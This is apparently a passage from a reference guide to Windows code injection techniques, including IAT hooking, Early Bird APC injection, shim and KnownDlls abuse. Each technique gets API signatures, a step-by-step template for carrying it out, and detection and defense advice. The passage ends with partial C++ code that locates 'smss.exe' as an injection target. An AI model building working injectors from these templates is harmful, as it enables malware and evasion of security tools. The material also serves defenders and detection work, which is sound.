VirtualProtectEx - Overwrite the module's code section with malicious code using
WriteProcessMemory - Restore the original memory protection with
VirtualProtectEx
Detection and Defense:
- Implement module integrity checks to detect modifications to loaded modules
- Use EDR solutions with capabilities to detect module stomping techniques
- Employ memory forensics tools to identify signs of module stomping
- Implement code signing and verification mechanisms for loaded modules
This technique modifies the Import Address Table (IAT) of a process to redirect function calls to malicious code. detected by comparing the IAT entries with the actual function addresses in the target DLLs.
Key APIs:
GetProcAddressFARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
VirtualProtectBOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
Template:
- Locate the IAT of the target process
- Identify the function to be hooked
- Change the memory protection of the IAT to writable using
VirtualProtect - Replace the original function address with the address of the malicious function
- Calculate the address of the IAT entry for the target function
- Read the original function address from the IAT entry
- Replace the original function address with the address of the malicious function
- Restore the original memory protection
Detection and Defense:
- Implement IAT integrity checks to detect modifications
- Use EDR solutions with capabilities to detect IAT hooking
- Employ runtime analysis to identify unexpected function redirections
- Implement code signing and verification mechanisms for loaded modules
This technique modifies the first few instructions of a function to redirect execution to malicious code. requires careful handling of multi-byte instructions and relative jumps.
Key APIs:
VirtualProtect(see above)memcpyvoid *memcpy( void *dest, const void *src, size_t count );
Template:
- Locate the target function in memory
- Change the memory protection to writable using
VirtualProtect - Save the original instructions (usually 5 or more bytes)
- Overwrite the beginning of the function with a jump to the malicious code
- In the malicious code, execute the saved original instructions and then jump back to the original function
Detection and Defense:
- Implement function integrity checks to detect modifications to function prologues
- Use EDR solutions with capabilities to detect inline hooking
- Employ runtime analysis to identify unexpected changes in function execution flow
- Implement code signing and verification mechanisms for loaded modules
This technique uses debugging APIs to inject code into a target process. can be detected by anti-debugging checks in the target process.
Key APIs:
DebugActiveProcessBOOL DebugActiveProcess( DWORD dwProcessId );
WaitForDebugEventBOOL WaitForDebugEvent( LPDEBUG_EVENT lpDebugEvent, DWORD dwMilliseconds );
ContinueDebugEventBOOL ContinueDebugEvent( DWORD dwProcessId, DWORD dwThreadId, DWORD dwContinueStatus );
Template:
- Attach to the target process as a debugger using
DebugActiveProcess - Wait for debug events with
WaitForDebugEvent - When a suitable event occurs, inject the malicious code using
WriteProcessMemory - Modify the thread context to execute the injected code
- Continue the debug event with
ContinueDebugEvent
Detection and Defense:
- Implement anti-debugging techniques in sensitive applications
- Monitor for suspicious use of debugging APIs
- Use EDR solutions with capabilities to detect debugger-based injection
- Employ runtime analysis to identify unexpected debugging events
This technique involves replacing legitimate COM objects with malicious ones to execute code when the COM object is instantiated. used for persistence, not just for injection.
Key APIs:
CoCreateInstanceHRESULT CoCreateInstance( REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv );
RegOverridePredefKeyLSTATUS RegOverridePredefKey( HKEY hKey, HKEY hNewHKey );
Template:
- Create a malicious COM object
- Modify the registry to replace the CLSID of a legitimate COM object with the malicious one
- When the application calls
CoCreateInstance, the malicious object will be instantiated instead
Detection and Defense:
- Implement COM object integrity checks
- Monitor for suspicious registry modifications related to COM objects
- Use application whitelisting to prevent unauthorized COM objects from loading
- Employ behavior-based detection to identify unexpected COM object instantiation
This technique involves creating a new section in a legitimate DLL and injecting code into it.
Key APIs:
LoadLibraryExHMODULE LoadLibraryExA( LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags );
VirtualAllocLPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
VirtualProtectBOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
Template:
- Load a legitimate DLL using
LoadLibraryExwithDONT_RESOLVE_DLL_REFERENCESflag - Allocate a new memory section using
VirtualAlloc - Copy the malicious code to the new section
- Modify the DLL's PE headers to include the new section
- Change the memory protection of the new section using
VirtualProtect - Execute the injected code
Detection and Defense:
- Implement DLL integrity checks to detect modifications
- Monitor for suspicious patterns of DLL loading and memory allocation
- Use EDR solutions with capabilities to detect phantom DLL hollowing
- Employ memory forensics tools to identify signs of DLL manipulation
This technique abuses the SetProp/GetProp Windows API functions to achieve code execution.
Key APIs:
SetPropBOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
GetPropHANDLE GetPropA( HWND hWnd, LPCSTR lpString );
EnumPropsExint EnumPropsExW( HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam );
Template:
- Find a target window using
FindWindoworEnumWindows - Allocate memory for the payload using
VirtualAllocEx - Write the payload to the allocated memory using
WriteProcessMemory - Use
SetPropto set a property on the window, with the payload address as the property value
- Create a custom window procedure that executes the payload
- Use
SetWindowLongPtrto replace the original window procedure with the custom one
- Trigger the execution by causing the window to enumerate its properties (e.g., by sending a message that causes a redraw)
Detection and Defense:
- Monitor for suspicious modifications to window properties
- Implement integrity checks for window properties
- Use EDR solutions with capabilities to detect PROPagate techniques
- Employ behavior-based detection to identify processes with unexpected changes in window properties
This technique injects code into a process during its initialization, before the main thread starts executing.
Key APIs:
CreateProcessBOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
VirtualAllocEx(see above)WriteProcessMemory(see above)QueueUserAPC(see above)ResumeThread(see above)
Template:
- Create a new process in suspended state using
CreateProcesswithCREATE_SUSPENDEDflag - Allocate memory in the new process using
VirtualAllocEx - Write the payload to the allocated memory using
WriteProcessMemory - Queue an APC to the main thread using
QueueUserAPC, pointing to the payload - Resume the main thread using
ResumeThread
Detection and Defense:
- Monitor for process creation with the
CREATE_SUSPENDEDflag - Implement process initialization monitoring to detect unexpected code execution
- Use EDR solutions with capabilities to detect Early Bird injection techniques
- Employ behavior-based detection to identify processes with abnormal initialization patterns
This technique leverages the Windows Application Compatibility framework to inject code.
Key APIs:
SdbCreateDatabasePDB SdbCreateDatabase( LPCWSTR pwszPath );
SdbWriteDWORDTagBOOL SdbWriteDWORDTag( PDB pdb, TAG tTag, DWORD dwData );
SdbEndWriteListTagBOOL SdbEndWriteListTag( PDB pdb, TAG tTag );
Template:
- Create a shim database using
SdbCreateDatabase - Write shim data to the database, including the payload and target application
- Install the shim database using
sdbinst.exe - The payload will be executed when the target application is launched
Detection and Defense:
- Monitor for suspicious shim database creation and installation
- Implement application compatibility shim monitoring
- Use EDR solutions with capabilities to detect shim-based injection techniques
- Employ whitelisting for approved shims and block unauthorized shim installations
This technique uses memory-mapped files to inject code into a remote process.
Key APIs:
CreateFileMappingHANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
MapViewOfFileLPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
NtMapViewOfSection(Undocumented)NTSTATUS NTAPI NtMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
Template:
- Create a file mapping object using
CreateFileMapping - Map a view of the file into the current process using
MapViewOfFile - Write the payload to the mapped view
- Use
NtMapViewOfSectionto map the view into the target process - Execute the payload in the target process
Detection and Defense:
- Monitor for suspicious patterns of file mapping and view creation
- Implement memory mapping monitoring to detect unexpected shared memory usage
- Use EDR solutions with capabilities to detect mapping injection techniques
- Employ behavior-based detection to identify processes with abnormal memory-mapped file usage
This technique involves replacing a legitimate DLL in the KnownDlls cache with a malicious one.
Key APIs:
NtSetSystemInformation(Undocumented)NTSTATUS NTAPI NtSetSystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength );
Template:
- Create a malicious DLL with the same name as a legitimate KnownDlls entry
- Create a Section object for the malicious DLL:
- Use NtCreateSection to create a section object
- Map a view of the section into memory
- Write the malicious DLL content to the mapped view
- Use
NtSetSystemInformationwithSystemExtendServiceTableInformationto add the malicious DLL to the KnownDlls cache - The malicious DLL will be loaded instead of the legitimate one by processes
Detection and Defense:
- Implement KnownDlls integrity checks
- Monitor for modifications to the KnownDlls cache
- Use EDR solutions with capabilities to detect KnownDlls cache poisoning
- Employ whitelisting and code signing verification for DLLs in the KnownDlls cache
- Implement a robust Application Whitelisting strategy to prevent unauthorized executables and DLLs from running.
- Use Windows Defender Exploit Guard or similar technologies to enable Attack Surface Reduction (ASR) rules.
- Keep systems and software up-to-date with the latest security patches.
- Utilize User Account Control (UAC) and principle of least privilege to limit the impact of successful injections.
- Implement Network Segmentation to limit lateral movement in case of a successful attack.
- Use Runtime Application Self-Protection (RASP) technologies to detect and prevent injection attempts in real-time.
- Regularly perform threat hunting activities to proactively search for signs of injection techniques.
- Implement and maintain a robust Security Information and Event Management (SIEM) system to correlate and analyze security events.
- Conduct regular security awareness training for users to recognize and report suspicious activities.
- Perform regular penetration testing and red team exercises to identify vulnerabilities and improve defenses against injection techniques.
#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>
#include <errhandlingapi.h> // GetLastError
#include <heapapi.h> // HeapCreate, HeapAlloc, HeapDestroy
#include <strsafe.h> // StringCchPrintf
#include <assert.h>
#include <tchar.h>
void ErrorExit(LPCTSTR lpszFunction);
int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe);
int PrintProcessInfo(const PROCESSENTRY32* lppe);
int PrintProcessInfo(const PROCESSENTRY32* lppe)
{
assert(lppe);
wprintf(L"PROCESS : %ls\n", lppe->szExeFile);
int PID = static_cast<int>(lppe->th32ProcessID);
if (PID == 0) {
wprintf(L"ERR : Process Not Found.\n");
return 0;
}
wprintf(L"PID : %i\n\n", PID);
return 1;
}
void ErrorExit(LPCTSTR functionName)
{
constexpr DWORD FLAGS = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS;
constexpr DWORD LANG_ID = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT);
constexpr size_t EXTRA_CHARS = 40;
DWORD errorCode = GetLastError();
LPTSTR messageBuf = nullptr;
FormatMessage(FLAGS, NULL, errorCode, LANG_ID, (LPTSTR)&messageBuf, 0, NULL);
if (messageBuf) {
size_t funcNameLen = _tcslen(functionName);
size_t messageLen = _tcslen(messageBuf);
size_t bufSize = (funcNameLen + messageLen + EXTRA_CHARS) * sizeof(TCHAR);
LPTSTR displayBuf = static_cast<LPTSTR>(LocalAlloc(LMEM_ZEROINIT, bufSize));
if (displayBuf) {
StringCchPrintf(displayBuf, LocalSize(displayBuf) / sizeof(TCHAR), TEXT("%s failed with error %d: %s"), functionName, errorCode, messageBuf);
MessageBox(NULL, displayBuf, TEXT("Error"), MB_OK);
LocalFree(displayBuf);
}
LocalFree(messageBuf);
}
ExitProcess(errorCode);
}
int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe)
{
assert(ProcessName && lppe);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
ErrorExit(TEXT("CreateToolhelp32Snapshot"));
lppe->dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, lppe) == FALSE) {
CloseHandle(hSnapshot);
ErrorExit(TEXT("Process32First"));
}
int pFoundFlag = 0;
do {
size_t wcProcessName = wcslen(ProcessName);
if (wcsncmp(lppe->szExeFile, ProcessName, wcProcessName) == 0) {
if (!PrintProcessInfo(lppe)) continue;
pFoundFlag = 1;
break;
}
} while (Process32Next(hSnapshot, lppe));
CloseHandle(hSnapshot);
return pFoundFlag;
}
int main(int argc, char** argv)
{
wchar_t pName[] = L"smss.exe"; // process name we will be injecting
PROCESSENTRY32 lppe = { 0 };
if (ProcessEnumerateAndSearch(pName, &lppe)) {
// do some stuff
}
else {
return 1;
}
return 0;
}